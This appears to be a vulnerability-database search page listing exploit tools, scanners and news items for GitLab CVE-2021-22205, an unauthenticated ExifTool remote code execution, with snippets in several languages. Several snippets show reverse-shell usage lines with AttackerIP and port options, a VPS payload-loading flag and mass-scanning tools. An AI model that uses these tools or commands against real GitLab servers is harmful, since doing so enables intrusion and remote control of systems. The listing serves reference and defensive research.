Lucene search
+L

42 matches found

Kitploit
Kitploit
added 2026/09/03 5:53 p.m.5 views

CVE-2021-22206

CVE-2021-22205 CVE-2021-22205 は、認証されていない GitLab のリモートコード実行(RCE)です。このツールは、GitLab Community Edition(CE)および Enterprise Edition(EE)の複数のバージョンに影響を与える脆弱性を悪用します。 この脆弱性は、GitLab が画像ファイルを処理する際に使用する ExifTool に存在します。認証されていない攻撃者は、特別に細工された画像ファイルをアップロードして、リモートコード実行を実現できます。 脆弱性の影響 影響を受けるバージョン : GitLab CE/EE 11.9 ...

10CVSS6.9AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/03 3:14 p.m.4 views

GitLab-CVE-2021-22205-scanner

GitLab-CVE-2021-22205-scanner 使用方法 root@kitploit: $ python3 GitLab-revshell.py -u https://gitlab.target.com -l AttackerIP -p AttackerPort クレジット https://hackerone.com/reports/1154542 ここからコードスニペットを参照: https://github.com/CsEnox/Gitlab-Exiftool-RCE/blob/main/exploit.py 免責事項: root@kitploit: The script...

10CVSS7.3AI score0.99731EPSS
SaveExploits29References1
Kitploit
Kitploit
added 2026/09/03 5:33 a.m.2 views

CVE-2021-22205

CVE-2021-22205 CVE-2021-22205 RCEツールは共有・交流のみを目的としており、無許可テストに使用しないでください。作者は一切責任を負いません。 root@kitploit: -R string VPS to load tools eg: -R 127.0.0.1:8083 -T string Tool name eg: -T fscan -c string exec cmd eg: -c "id" default "id" -host string reverse shell host -m string Method for using of...

10CVSS7.3AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/03 2:25 a.m.6 views

CVE-2021-22205

CVE-2021-22205 Pocsuite3 For CVE-2021-22205、未認証RCE。...

10CVSS7.3AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/03 1:55 a.m.6 views

CVE-2021-22205-gitlab

漏洞影响 已发现 GitLab CE/EE 中一个影响所有 11.9 及以上版本的问题。GitLab 未能正确验证传递给文件解析器的图像文件,从而导致远程命令执行。 受影响产品 Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 环境搭建 root@kitploit: export GITLABHOME=/srv/gitlab sudo docker run --detach \ --hostname gitlab.example.com \ --publish 443:443 --publish 80:80 ...

9.1CVSS7AI score0.01344EPSS
SaveExploits3References1
Kitploit
Kitploit
added 2026/09/02 11:33 p.m.4 views

cve-2021-22205

このリポジトリには README がありません。...

10CVSS7.3AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/02 8:11 p.m.3 views

CVE-2021-22205

脆弱性の影響 GitLab CE/EE の 11.9 以降のすべてのバージョンにおいて、問題が発見されました。GitLab はファイルパーサーに渡された画像ファイルを適切に検証していなかったため、リモートコマンド実行が発生しました。 脆弱性のある製品 Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 環境 root@kitploit: export GITLABHOME=/srv/gitlab sudo docker run --detach \ --hostname gitlab.example.com ...

10CVSS7AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/02 11:40 a.m.4 views

gitlab-cve-2021-22205

gitlab-cve-2021-22205 一个简单的bash脚本,用于利用CVE-2021-22205攻击存在漏洞的gitlab实例 用法 root@kitploit: Usage: cve-2021-22205.sh options Options: -h,--help Show this help -t,--target Set the target server i.e. "http://gitlab.example.com" -i,--reverse-ip Set the IP to connect back to -p,--reverse-port Set the port ...

10CVSS7.3AI score0.99731EPSS
SaveExploits29References2
Kitploit
Kitploit
added 2026/09/02 6:23 a.m.5 views

GitLab-cve-2021-22205-nse

Frank breedijk(DIVD.nl)による CVE-2021-22205 の GitLab インスタンスのフィンガープリント用スクリプト...

10CVSS7.3AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/02 1:49 a.m.4 views

Gitlab-CVE-2021-22205

Gitlab-CVE-2021-22205 CVE-2021-22205 のマルチスレッド一括検出スクリプト dnslog を使用して poc と組み合わせた検出が可能 マルチスレッドで検出を実行 コマンド実行をカスタマイズ可能...

10CVSS7.3AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/01 8:24 p.m.3 views

Golang-CVE-2021-22205-POC

Golang-CVE-2021-22205-POC CVE-2021-22205 Gitlab RCE POCの簡易版で、Golangで書かれており、影響を受けるのはGitlab CE/EE /tmp/pizza.txt" tフラグは対象のGitlabインスタンスを、cフラグは実行したいコマンドを指定します。 スクリプトはプロキシとしてhttp://localhost:9090を使用するよう設定されています。プロキシを使いたくない場合は、その行を削除する必要があります。 脆弱なDocker環境はこちらにあります:...

10CVSS7.1AI score0.99981EPSS
SaveExploits56References1
Kitploit
Kitploit
added 2026/09/01 10:21 a.m.5 views

CVE-2021-22205

Impacto de la Vulnerabilidad Se ha descubierto un problema en GitLab CE/EE que afecta a todas las versiones a partir de la 11.9. GitLab no validaba correctamente los archivos de imagen que se pasaban a un analizador de archivos, lo que resultó en una ejecución remota de comandos. Producto...

10CVSS7AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/08/31 11:59 a.m.3 views

CVE-2021-22205

脆弱性の影響 GitLab CE/EE のバージョン11.9以降に影響する問題が発見されました。GitLab はファイルパーサーに渡される画像ファイルを適切に検証しておらず、リモートコマンド実行が発生していました。 脆弱性の影響を受ける製品 Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 環境 root@kitploit: export GITLABHOME=/srv/gitlab sudo docker run --detach \ --hostname gitlab.example.com \ --publis...

10CVSS7AI score0.99981EPSS
SaveExploits56References1
Kitploit
Kitploit
added 2026/08/29 1:46 p.m.5 views

DejaVu-CVE-2021-22205

Questo repository non contiene un README...

10CVSS7.3AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/08/29 4:45 a.m.3 views

CVE-2021-22205

CVE-2021-22205...

10CVSS7.3AI score0.99731EPSS
SaveExploits29
RedhatCVE
RedhatCVE
added 2025/02/06 4:12 a.m.19 views

CVE-2021-22205

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution...

10CVSS9.6AI score0.99731EPSS
SaveExploits29References1
GithubExploit
GithubExploit
added 2024/05/19 11:14 p.m.454 views

Exploit for Code Injection in Gitlab

CVE-2021-22205 Preauth RCE via exiftool on Gitlab CE/EE...

10CVSS8.9AI score0.99731EPSS
SaveExploits29
The Hacker News
The Hacker News
added 2023/09/20 7:18 a.m.173 views

GitLab Releases Urgent Security Patches for Critical Vulnerability

GitLab has shipped security patches to resolve a critical flaw that allows an attacker to run pipelines as another user. The issue, tracked as CVE-2023-5009 CVSS score: 9.6, impacts all versions of GitLab Enterprise Edition EE starting from 13.12 and prior to 16.2.7 as well as from 16.3 and befor...

10CVSS8.8AI score0.99731EPSS
SaveExploits30
The Hacker News
The Hacker News
added 2023/08/17 2:26 p.m.136 views

New LABRAT Campaign Exploits GitLab Flaw for Cryptojacking and Proxyjacking Activities

A new, financially motivated operation dubbed LABRAT has been observed weaponizing a now-patched critical flaw in GitLab as part of a cryptojacking and proxyjacking campaign. "The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware,...

10CVSS8.1AI score0.99731EPSS
SaveExploits183
hivepro
hivepro
added 2023/05/25 6:36 a.m.67 views

GUI-Vil Threat Group Exploits AWS for Crypto Mining

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary GUI-Vil p0-LUCR-1, an Indonesian threat group, conducts unauthorized cryptocurrency mining using personalized infiltration tactics. They exploit AWS, leveraging compromised credentials and vulnerabilitie...

7.5CVSS7AI score0.99731EPSS
SaveExploits29
Rows per page
Query Builder